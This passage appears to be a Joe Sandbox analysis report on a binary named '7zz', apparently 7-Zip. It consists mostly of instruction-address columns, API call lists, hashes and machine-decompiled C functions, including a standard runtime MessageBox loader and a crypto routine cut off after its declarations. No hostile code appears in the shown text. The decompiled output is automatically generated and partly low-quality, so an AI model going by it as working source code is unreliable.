                                                                                  0x00441b79
                                                                                  0x00441b77
                                                                                  0x00441b7c
                                                                                  0x00441b7f
                                                                                  0x00441ba6
                                                                                  0x00441bb0
                                                                                  0x00441bb3
                                                                                  0x00441bb5
                                                                                  0x00441bb9
                                                                                  0x00441bbe
                                                                                  0x00441bc1
                                                                                  0x00441bd3
                                                                                  0x00441bd3
                                                                                  0x00441bc3
                                                                                  0x00441bc3
                                                                                  0x00441bc6
                                                                                  0x00441bc9
                                                                                  0x00441bcf
                                                                                  0x00441bcf
                                                                                  0x00441bd5
                                                                                  0x00441bd7
                                                                                  0x00441bda
                                                                                  0x00441bdd
                                                                                  0x00441be2
                                                                                  0x00441be2
                                                                                  0x00441be5
                                                                                  0x00441be9
                                                                                  0x00441bec
                                                                                  0x00441bf0
                                                                                  0x00441bfb
                                                                                  0x00441c00
                                                                                  0x00441c09
                                                                                  0x00441c0d
                                                                                  0x00441c10
                                                                                  0x00441c20
                                                                                  0x00441c2b
                                                                                  0x00441c30
                                                                                  0x00441c42
                                                                                  0x00441c46
                                                                                  0x00441c4c
                                                                                  0x00441c57
                                                                                  0x00441c5b
                                                                                  0x00441c68
                                                                                  0x00441c6c
                                                                                  0x00441c71
                                                                                  0x00441c80
                                                                                  0x00441c84
                                                                                  0x00441c89
                                                                                  0x00441c9e
                                                                                  0x00441ca7
                                                                                  0x00441ca9
                                                                                  0x00441cab
                                                                                  0x00441d3b
                                                                                  0x00441d3e
                                                                                  0x00441d40
                                                                                  0x00441d43
                                                                                  0x00441d87
                                                                                  0x00441d87
                                                                                  0x00441d8a
                                                                                  0x00441d8c
                                                                                  0x00441dc2
                                                                                  0x00441dc2
                                                                                  0x00441dc4
                                                                                  0x00441dc7
                                                                                  0x00441e8d
                                                                                  0x00441e90
                                                                                  0x00441e94
                                                                                  0x00441e97
                                                                                  0x00441e9a
                                                                                  0x00441e9d
                                                                                  0x00441e9f
                                                                                  0x00442578
                                                                                  0x00442582
                                                                                  0x0044258a
                                                                                  0x0044258e
                                                                                  0x00442599
                                                                                  0x0044259d
                                                                                  0x004425a8
                                                                                  0x004425ac
                                                                                  0x004425b7
                                                                                  0x004425bb
                                                                                  0x004425c6
                                                                                  0x004425ca
                                                                                  0x004425d5
                                                                                  0x004425d9
                                                                                  0x004425e1
                                                                                  0x004425e5
                                                                                  0x004425ed
                                                                                  0x004425f1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00441ea5
                                                                                  0x00441ea5
                                                                                  0x00441ea8
                                                                                  0x00441eab
                                                                                  0x00442245
                                                                                  0x0044224e
                                                                                  0x00442251
                                                                                  0x00442254
                                                                                  0x00442257
                                                                                  0x0044225a
                                                                                  0x0044226a
                                                                                  0x00442273
                                                                                  0x00442278
                                                                                  0x0044227b
                                                                                  0x0044227f
                                                                                  0x00442285
                                                                                  0x00442297
                                                                                  0x004422a5
                                                                                  0x004422ab
                                                                                  0x004422ad
                                                                                  0x004428ae
                                                                                  0x004428b7
                                                                                  0x004428bd
                                                                                  0x004428c1
                                                                                  0x004428c9
                                                                                  0x004428cd
                                                                                  0x004428d8
                                                                                  0x004428dc
                                                                                  0x004428e7
                                                                                  0x004428eb
                                                                                  0x004428f6
                                                                                  0x004428fa
                                                                                  0x00442905
                                                                                  0x00442909
                                                                                  0x00442914
                                                                                  0x00442918
                                                                                  0x00442920
                                                                                  0x00442924
                                                                                  0x00442929
                                                                                  0x0044292c
                                                                                  0x00442930
                                                                                  0x00442935
                                                                                  0x0044293b
                                                                                  0x0044293f
                                                                                  0x00442944
                                                                                  0x0044294e
                                                                                  0x00442953
                                                                                  0x00000000
                                                                                  0x00442953
                                                                                  0x004422b3
                                                                                  0x004422b5
                                                                                  0x00442511
                                                                                  0x00442523
                                                                                  0x00442528
                                                                                  0x0044252a
                                                                                  0x004428b5
                                                                                  0x004428b5
                                                                                  0x00000000
                                                                                  0x004428b5
                                                                                  0x00442530
                                                                                  0x00442539
                                                                                  0x0044253a
                                                                                  0x0044253f
                                                                                  0x00442546
                                                                                  0x00442552
                                                                                  0x00442557
                                                                                  0x00442557
                                                                                  0x00442557
                                                                                  0x0044255a
                                                                                  0x0044255a
                                                                                  0x0044255e
                                                                                  0x00442564
                                                                                  0x00442564
                                                                                  0x00000000
                                                                                  0x00442564
                                                                                  0x004422bb
                                                                                  0x004422bb
                                                                                  0x004422be
                                                                                  0x004422cb
                                                                                  0x004422c0
                                                                                  0x004422c0
                                                                                  0x004422c0
                                                                                  0x004422d0
                                                                                  0x004422d2
                                                                                  0x004422ef
                                                                                  0x004422f2
                                                                                  0x00442329
                                                                                  0x004422f4
                                                                                  0x004422f7
                                                                                  0x004422fd
                                                                                  0x00442306
                                                                                  0x0044230a
                                                                                  0x00442322
                                                                                  0x00442322
                                                                                  0x00442335
                                                                                  0x00442338
                                                                                  0x0044233b
                                                                                  0x0044233e
                                                                                  0x004423c9
                                                                                  0x004423cc
                                                                                  0x004423cf
                                                                                  0x004423d2
                                                                                  0x004423d4
                                                                                  0x004423dd
                                                                                  0x004423de
                                                                                  0x004423e2
                                                                                  0x004423ed
                                                                                  0x004423f8
                                                                                  0x004423fc
                                                                                  0x00442404
                                                                                  0x00442408
                                                                                  0x00442408
                                                                                  0x0044241c
                                                                                  0x00442425
                                                                                  0x00442431
                                                                                  0x00442437
                                                                                  0x0044243c
                                                                                  0x00442442
                                                                                  0x00442449
                                                                                  0x0044244b
                                                                                  0x00000000
                                                                                  0x00442451
                                                                                  0x00442459
                                                                                  0x00442469
                                                                                  0x0044246e
                                                                                  0x00442471
                                                                                  0x004424e8
                                                                                  0x004424ef
                                                                                  0x004424f2
                                                                                  0x00442505
                                                                                  0x00442506
                                                                                  0x00442506
                                                                                  0x00442508
                                                                                  0x00000000
                                                                                  0x00442508
                                                                                  0x00442476
                                                                                  0x0044247b
                                                                                  0x0044247d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00442486
                                                                                  0x0044248c
                                                                                  0x00442497
                                                                                  0x004424a2
                                                                                  0x004424ac
                                                                                  0x004424b3
                                                                                  0x004424b8
                                                                                  0x004424c6
                                                                                  0x004424d4
                                                                                  0x004424d5
                                                                                  0x00000000
                                                                                  0x004424d5
                                                                                  0x00442340
                                                                                  0x00442340
                                                                                  0x00442349
                                                                                  0x0044234a
                                                                                  0x0044234e
                                                                                  0x0044235f
                                                                                  0x0044236d
                                                                                  0x00442371
                                                                                  0x00442378
                                                                                  0x00442388
                                                                                  0x0044238a
                                                                                  0x00442398
                                                                                  0x00442399
                                                                                  0x004423a8
                                                                                  0x004423b0
                                                                                  0x004423b4
                                                                                  0x00000000
                                                                                  0x004423b4
                                                                                  0x004422d4
                                                                                  0x004422d4
                                                                                  0x004422e2
                                                                                  0x00000000
                                                                                  0x004422e2
                                                                                  0x004422d2
                                                                                  0x00442281
                                                                                  0x00442283
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00442283
                                                                                  0x0044225c
                                                                                  0x00000000
                                                                                  0x0044225c
                                                                                  0x00441eb1
                                                                                  0x00441eb4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00441ec6
                                                                                  0x00441ec9
                                                                                  0x00441ecc
                                                                                  0x00441ece
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00441eda
                                                                                  0x00441edf
                                                                                  0x00441ee2
                                                                                  0x00441ee6
                                                                                  0x00442099
                                                                                  0x004420a3
                                                                                  0x004420b1
                                                                                  0x004420be
                                                                                  0x004420cb
                                                                                  0x004420d1
                                                                                  0x004420d3
                                                                                  0x0044262d
                                                                                  0x00442631
                                                                                  0x00442639
                                                                                  0x0044263d
                                                                                  0x00442648
                                                                                  0x0044264c
                                                                                  0x00442657
                                                                                  0x0044265b
                                                                                  0x00442666
                                                                                  0x0044266a
                                                                                  0x00442675
                                                                                  0x00442679
                                                                                  0x00442684
                                                                                  0x00442688
                                                                                  0x0044268d
                                                                                  0x00442690
                                                                                  0x00442694
                                                                                  0x00442696
                                                                                  0x0044269b
                                                                                  0x0044269b
                                                                                  0x0044269e
                                                                                  0x004426a8
                                                                                  0x004426ac
                                                                                  0x004426b4
                                                                                  0x004426b8
                                                                                  0x004426bd
                                                                                  0x00000000
                                                                                  0x004426bd
                                                                                  0x004420e4
                                                                                  0x004420e6
                                                                                  0x00442236
                                                                                  0x00442236
                                                                                  0x0044223a
                                                                                  0x00000000
                                                                                  0x0044223a
                                                                                  0x004420ec
                                                                                  0x004420ec
                                                                                  0x004420f5
                                                                                  0x004420f9
                                                                                  0x004420fc
                                                                                  0x00442102
                                                                                  0x00442105
                                                                                  0x00442109
                                                                                  0x00442113
                                                                                  0x00442116
                                                                                  0x00442119
                                                                                  0x0044211c
                                                                                  0x00442186
                                                                                  0x00442189
                                                                                  0x0044218b
                                                                                  0x0044277b
                                                                                  0x00442781
                                                                                  0x00442784
                                                                                  0x00442788
                                                                                  0x0044278a
                                                                                  0x0044278f
                                                                                  0x0044278f
                                                                                  0x00442798
                                                                                  0x0044279c
                                                                                  0x004427a4
                                                                                  0x004427a8
                                                                                  0x004427b3
                                                                                  0x004427b7
                                                                                  0x004427c2
                                                                                  0x004427c6
                                                                                  0x004427d1
                                                                                  0x004427d5
                                                                                  0x004427e0
                                                                                  0x004427e4
                                                                                  0x004427ef
                                                                                  0x004427f3
                                                                                  0x004427f8
                                                                                  0x004427fb
                                                                                  0x004427ff
                                                                                  0x00442801
                                                                                  0x00442806
                                                                                  0x00442806
                                                                                  0x00442809
                                                                                  0x00442810
                                                                                  0x00442761
                                                                                  0x00442764
                                                                                  0x0044276c
                                                                                  0x00442770
                                                                                  0x00000000
                                                                                  0x00442770
                                                                                  0x00442191
                                                                                  0x0044219b
                                                                                  0x0044219d
                                                                                  0x0044219f
                                                                                  0x0044281a
                                                                                  0x00442820
                                                                                  0x00442823
                                                                                  0x00442827
                                                                                  0x00442829
                                                                                  0x0044282e
                                                                                  0x0044282e
                                                                                  0x00442837
                                                                                  0x0044283b
                                                                                  0x00442843
                                                                                  0x00442847
                                                                                  0x00442852
                                                                                  0x00442856
                                                                                  0x00442861
                                                                                  0x00442865
                                                                                  0x00442870
                                                                                  0x00442874
                                                                                  0x0044287f
                                                                                  0x00442883
                                                                                  0x0044288e
                                                                                  0x00442892
                                                                                  0x00442897
                                                                                  0x0044289a
                                                                                  0x0044289e
                                                                                  0x004428a0
                                                                                  0x004428a9
                                                                                  0x004428a9
                                                                                  0x00000000
                                                                                  0x004428a0
                                                                                  0x004421a6
                                                                                  0x004421aa
                                                                                  0x004421b0
                                                                                  0x004421b2
                                                                                  0x004421b5
                                                                                  0x0044222a
                                                                                  0x0044222d
                                                                                  0x00442231
                                                                                  0x00000000
                                                                                  0x00442231
                                                                                  0x004421b7
                                                                                  0x004421bd
                                                                                  0x004421bd
                                                                                  0x004421bf
                                                                                  0x004421c5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004421c7
                                                                                  0x004421c8
                                                                                  0x004421cb
                                                                                  0x004421ce
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004421d0
                                                                                  0x004421d2
                                                                                  0x004421db
                                                                                  0x004421de
                                                                                  0x004421e6
                                                                                  0x004421ee
                                                                                  0x004421fc
                                                                                  0x00442201
                                                                                  0x00442204
                                                                                  0x0044220f
                                                                                  0x0044220f
                                                                                  0x00442216
                                                                                  0x0044221c
                                                                                  0x00442225
                                                                                  0x00000000
                                                                                  0x00442225
                                                                                  0x00442127
                                                                                  0x00442129
                                                                                  0x0044212f
                                                                                  0x0044213b
                                                                                  0x00442140
                                                                                  0x0044214a
                                                                                  0x0044214c
                                                                                  0x0044214e
                                                                                  0x004426c8
                                                                                  0x004426ce
                                                                                  0x004426d1
                                                                                  0x004426d5
                                                                                  0x004426d7
                                                                                  0x004426dc
                                                                                  0x004426dc
                                                                                  0x004426e5
                                                                                  0x004426e9
                                                                                  0x004426f1
                                                                                  0x004426f5
                                                                                  0x00442700
                                                                                  0x00442704
                                                                                  0x0044270f
                                                                                  0x00442713
                                                                                  0x0044271e
                                                                                  0x00442722
                                                                                  0x0044272d
                                                                                  0x00442731
                                                                                  0x0044273c
                                                                                  0x00442740
                                                                                  0x00442745
                                                                                  0x00442748
                                                                                  0x0044274c
                                                                                  0x0044274e
                                                                                  0x00442753
                                                                                  0x00442753
                                                                                  0x00442756
                                                                                  0x0044275d
                                                                                  0x00000000
                                                                                  0x0044275d
                                                                                  0x00442162
                                                                                  0x00442166
                                                                                  0x0044216c
                                                                                  0x0044216f
                                                                                  0x00442173
                                                                                  0x00442175
                                                                                  0x0044217e
                                                                                  0x0044217e
                                                                                  0x00000000
                                                                                  0x00442175
                                                                                  0x00441eec
                                                                                  0x00441eef
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00442569
                                                                                  0x0044256c
                                                                                  0x0044256f
                                                                                  0x0044256f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00441dcd
                                                                                  0x00441dcd
                                                                                  0x00441dd3
                                                                                  0x00441dd8
                                                                                  0x00441ddd
                                                                                  0x00441ddf
                                                                                  0x00441de2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00441de8
                                                                                  0x00441dea
                                                                                  0x00441df0
                                                                                  0x00441df3
                                                                                  0x00441df5
                                                                                  0x00441df9
                                                                                  0x00441e0b
                                                                                  0x00441e0b
                                                                                  0x00441dfb
                                                                                  0x00441e04
                                                                                  0x00441e04
                                                                                  0x00441e0f
                                                                                  0x00441e13
                                                                                  0x00441e16
                                                                                  0x00441e1b
                                                                                  0x00441e1d
                                                                                  0x00441e20
                                                                                  0x00441f8c
                                                                                  0x00441f90
                                                                                  0x00441f9b
                                                                                  0x00441f9f
                                                                                  0x00441faa
                                                                                  0x00441fae
                                                                                  0x00441fb9
                                                                                  0x00441fbd
                                                                                  0x00441fc8
                                                                                  0x00441fcc
                                                                                  0x00441fd7
                                                                                  0x00441fdb
                                                                                  0x00441fe0
                                                                                  0x00441fe3
                                                                                  0x00441fe7
                                                                                  0x00441fe9
                                                                                  0x00441fee
                                                                                  0x00441fee
                                                                                  0x00441ff1
                                                                                  0x00441ffb
                                                                                  0x00441fff
                                                                                  0x00442007
                                                                                  0x0044200b
                                                                                  0x00442010
                                                                                  0x00000000
                                                                                  0x00441e26
                                                                                  0x00441e2c
                                                                                  0x00441e31
                                                                                  0x00441e38
                                                                                  0x00441e3a
                                                                                  0x00441e3f
                                                                                  0x00441e42
                                                                                  0x00441e4f
                                                                                  0x00441e4f
                                                                                  0x00441e44
                                                                                  0x00441e44
                                                                                  0x00441e47
                                                                                  0x00441e47
                                                                                  0x00441e55
                                                                                  0x00441e58
                                                                                  0x00441e5d
                                                                                  0x00441e67
                                                                                  0x00441e6c
                                                                                  0x00441e71
                                                                                  0x00441e79
                                                                                  0x00441e7b
                                                                                  0x00441e7d
                                                                                  0x0044201b
                                                                                  0x0044201f
                                                                                  0x0044202a
                                                                                  0x0044202e
                                                                                  0x00442039
                                                                                  0x0044203d
                                                                                  0x00442048
                                                                                  0x0044204c
                                                                                  0x00442057
                                                                                  0x0044205b
                                                                                  0x00442066
                                                                                  0x0044206a
                                                                                  0x0044206f
                                                                                  0x00442072
                                                                                  0x00442076
                                                                                  0x00442078
                                                                                  0x0044207d
                                                                                  0x0044207d
                                                                                  0x00442080
                                                                                  0x00442087
                                                                                  0x00000000
                                                                                  0x00441e83
                                                                                  0x00441e83
                                                                                  0x00441e84
                                                                                  0x00441e87
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00441e87
                                                                                  0x00441e7d
                                                                                  0x00441e20
                                                                                  0x00441efd
                                                                                  0x00441f01
                                                                                  0x00441f0c
                                                                                  0x00441f10
                                                                                  0x00441f1b
                                                                                  0x00441f1f
                                                                                  0x00441f2a
                                                                                  0x00441f2e
                                                                                  0x00441f39
                                                                                  0x00441f3d
                                                                                  0x00441f48
                                                                                  0x00441f4c
                                                                                  0x00441f51
                                                                                  0x00441f54
                                                                                  0x00441f58
                                                                                  0x00441f5a
                                                                                  0x00441f5f
                                                                                  0x00441f5f
                                                                                  0x00441f62
                                                                                  0x00441f6c
                                                                                  0x00441f70
                                                                                  0x00441f78
                                                                                  0x00441f7c
                                                                                  0x00441f81
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00441d8e
                                                                                  0x00441d8e
                                                                                  0x00441d9a
                                                                                  0x00441da0
                                                                                  0x00441da7
                                                                                  0x00441dab
                                                                                  0x00441db6
                                                                                  0x00441dba
                                                                                  0x00441dbf
                                                                                  0x00441dbf
                                                                                  0x00441dbf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00441d45
                                                                                  0x00441d45
                                                                                  0x00441d4b
                                                                                  0x00441d50
                                                                                  0x00441d56
                                                                                  0x00441d68
                                                                                  0x00441d69
                                                                                  0x00441d6d
                                                                                  0x00441d78
                                                                                  0x00441d7c
                                                                                  0x00441d81
                                                                                  0x00441d82
                                                                                  0x00441d82
                                                                                  0x00000000
                                                                                  0x00441cb1
                                                                                  0x00441cb4
                                                                                  0x00441cb8
                                                                                  0x00441cc3
                                                                                  0x00441cc7
                                                                                  0x00441cd2
                                                                                  0x00441cd6
                                                                                  0x00441ce1
                                                                                  0x00441ce5
                                                                                  0x00441cf0
                                                                                  0x00441cf4
                                                                                  0x00441cff
                                                                                  0x00441d03
                                                                                  0x00441d08
                                                                                  0x00441d0b
                                                                                  0x00441d0f
                                                                                  0x00441d11
                                                                                  0x00441d16
                                                                                  0x00441d16
                                                                                  0x00441d19
                                                                                  0x00441d1c
                                                                                  0x00441d20
                                                                                  0x00441d23
                                                                                  0x00441d2b
                                                                                  0x00441d2f
                                                                                  0x00441d34
                                                                                  0x004425f6
                                                                                  0x004425fc
                                                                                  0x00442600
                                                                                  0x00442605
                                                                                  0x0044260f
                                                                                  0x00442614
                                                                                  0x00442616
                                                                                  0x0044261c
                                                                                  0x00442624
                                                                                  0x00442624
                                                                                  0x00441cab
                                                                                  0x00000000
                                                                                  0x00441b7f
                                                                                  0x00441af2
                                                                                  0x00441af7
                                                                                  0x00441afc
                                                                                  0x00441afe
                                                                                  0x00441afe
                                                                                  0x00441b04
                                                                                  0x00441b09
                                                                                  0x00441b0d
                                                                                  0x00441b0e
                                                                                  0x00441b3e
                                                                                  0x00441b16
                                                                                  0x00441b18
                                                                                  0x00441b1a
                                                                                  0x00441b1d
                                                                                  0x00441b1f
                                                                                  0x00441b1f
                                                                                  0x00441b1d
                                                                                  0x00441b3f
                                                                                  0x00441b44
                                                                                  0x00441b44
                                                                                  0x00441b46
                                                                                  0x00441b4e
                                                                                  0x00441b51
                                                                                  0x00000000
                                                                                  0x00441b53
                                                                                  0x00441b53
                                                                                  0x00000000
                                                                                  0x00441b53
                                                                                  0x00441b51
                                                                                  0x00441ad9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00441adf
                                                                                  0x00000000
                                                                                  0x00441adf
                                                                                  0x00441ac4
                                                                                  0x00441aa1
                                                                                  0x00441aa9
                                                                                  0x00441aad
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00441962
                                                                                  0x00441962
                                                                                  0x00441965
                                                                                  0x0044196a
                                                                                  0x00441999
                                                                                  0x004419a2
                                                                                  0x004419a3
                                                                                  0x004419ae
                                                                                  0x004419bb
                                                                                  0x004419cb
                                                                                  0x004419cc
                                                                                  0x004419d4
                                                                                  0x004419d6
                                                                                  0x00441b23
                                                                                  0x00441b2d
                                                                                  0x00441b32
                                                                                  0x00000000
                                                                                  0x004419dc
                                                                                  0x004419eb
                                                                                  0x004419fe
                                                                                  0x00441a06
                                                                                  0x00441a0c
                                                                                  0x00441a0f
                                                                                  0x00441a12
                                                                                  0x00441a12
                                                                                  0x00441a12
                                                                                  0x00441a1c
                                                                                  0x00000000
                                                                                  0x00441a1c
                                                                                  0x0044196c
                                                                                  0x0044196f
                                                                                  0x00441972
                                                                                  0x00441975
                                                                                  0x0044197b
                                                                                  0x00441981
                                                                                  0x00441984
                                                                                  0x00441988
                                                                                  0x00441988
                                                                                  0x00441a21
                                                                                  0x00441a21
                                                                                  0x00441a25
                                                                                  0x00441a28
                                                                                  0x00441a2b
                                                                                  0x00441a2c
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0044192A
                                                                                  • __aulldiv.LIBCMT ref: 00441AF2
                                                                                  • __aulldiv.LIBCMT ref: 00441B04
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004426C8
                                                                                    • Part of subcall function 00443BAF: __EH_prolog.LIBCMT ref: 00443BB4
                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00000004,00000004,00010000,?,00000001), ref: 004420FC
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00442166
                                                                                  • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,00000004,00000004,00010000,?,00000001), ref: 0044241C
                                                                                    • Part of subcall function 00440F0D: __EH_prolog.LIBCMT ref: 00440F12
                                                                                    • Part of subcall function 00467B10: SetEvent.KERNEL32(00000000,00410FDF), ref: 00467B13
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004421AA
                                                                                    • Part of subcall function 00441083: EnterCriticalSection.KERNEL32(?,00000000,?,00442557,0000001A,?,?,?,?,00000004,00000004,00010000,?,00000001), ref: 0044108B
                                                                                    • Part of subcall function 00441083: LeaveCriticalSection.KERNEL32(?), ref: 004410AE
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044277B
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044281A
                                                                                    • Part of subcall function 00442DE5: __EH_prolog.LIBCMT ref: 00442DEA
                                                                                    • Part of subcall function 00442E79: __EH_prolog.LIBCMT ref: 00442E7E
                                                                                    • Part of subcall function 0044296D: __EH_prolog.LIBCMT ref: 00442972
                                                                                    • Part of subcall function 0044296D: DeleteCriticalSection.KERNEL32(?,?,?,004425CF,00000004,00000004,00010000,?,00000001), ref: 00442996
                                                                                    • Part of subcall function 0044395A: __EH_prolog.LIBCMT ref: 0044395F
                                                                                    • Part of subcall function 0044395A: DeleteCriticalSection.KERNEL32(?,?,?,004425DE,00000004,00000004,00010000,?,00000001), ref: 00443976
                                                                                    • Part of subcall function 0043F571: __EH_prolog.LIBCMT ref: 0043F576
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$H_prolog$Leave$DeleteEnter__aulldiv$EventMultipleObjectsWait
                                                                                  • String ID: D
                                                                                  • API String ID: 1344393993-2746444292
                                                                                  • Opcode ID: ebf051fc97326ff15014fddf33e1ce4ac637c8adec1716bc8864d6dceb0aae89
                                                                                  • Instruction ID: b7ea9ee86155e0a7c7e569c876f0c1e31397adaa9b36ed63c9e7592aed198d63
                                                                                  • Opcode Fuzzy Hash: ebf051fc97326ff15014fddf33e1ce4ac637c8adec1716bc8864d6dceb0aae89
                                                                                  • Instruction Fuzzy Hash: A7B27030D00288DFEB15EFA4C994BDDBBB0AF19308F54809EE54967292DB785E49CF19
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00471C24 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 46%
                                                                                  			E00471C24(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x493850 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x493854; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x493858; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x493850(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x493850 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x493854 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x493858 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}









                                                                                  0x00471c25
                                                                                  0x00471c27
                                                                                  0x00471c2f
                                                                                  0x00471c73
                                                                                  0x00471c73
                                                                                  0x00471c7a
                                                                                  0x00471c7e
                                                                                  0x00471c82
                                                                                  0x00471c84
                                                                                  0x00471c8b
                                                                                  0x00471c90
                                                                                  0x00471c90
                                                                                  0x00471c8b
                                                                                  0x00471c82
                                                                                  0x00000000
                                                                                  0x00471c9f
                                                                                  0x00471c3c
                                                                                  0x00471c40
                                                                                  0x00471ca9
                                                                                  0x00000000
                                                                                  0x00471ca9
                                                                                  0x00471c4e
                                                                                  0x00471c52
                                                                                  0x00471c57
                                                                                  0x00000000
                                                                                  0x00471c59
                                                                                  0x00471c67
                                                                                  0x00471c6e
                                                                                  0x00000000
                                                                                  0x00471c6e

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,00470D65,?,Microsoft Visual C++ Runtime Library,00012010,?,0047CC5C,?,0048A174,?,?,?,Runtime Error!Program: ), ref: 00471C36
                                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00471C4E
                                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00471C5F
                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00471C6C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                  • API String ID: 2238633743-4044615076
                                                                                  • Opcode ID: c93d45f6ab12ccfc8be7b15ae8812bf4fd7e40829fe0effbe83a31a9d7762021
                                                                                  • Instruction ID: ea4433a42688f02017ac68f8dd25db1f7bd77ae58eff3a6fbc345d1a27d7865b
                                                                                  • Opcode Fuzzy Hash: c93d45f6ab12ccfc8be7b15ae8812bf4fd7e40829fe0effbe83a31a9d7762021
                                                                                  • Instruction Fuzzy Hash: F1018471740311AF8722EFF99CC49AB7BE8EBA6741314847FB10DD2230DB7889418B69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004311FE Relevance: 8.7, APIs: 3, Strings: 1, Instructions: 1676COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 81%
                                                                                  			E004311FE(intOrPtr __ecx, void* __edx) {
				signed int _t1032;
				signed int _t1034;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				intOrPtr* _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1058;
				signed int* _t1059;
				signed int _t1062;
				signed int _t1076;
				signed int* _t1092;
				signed int _t1093;
				signed int _t1113;
				signed int _t1114;
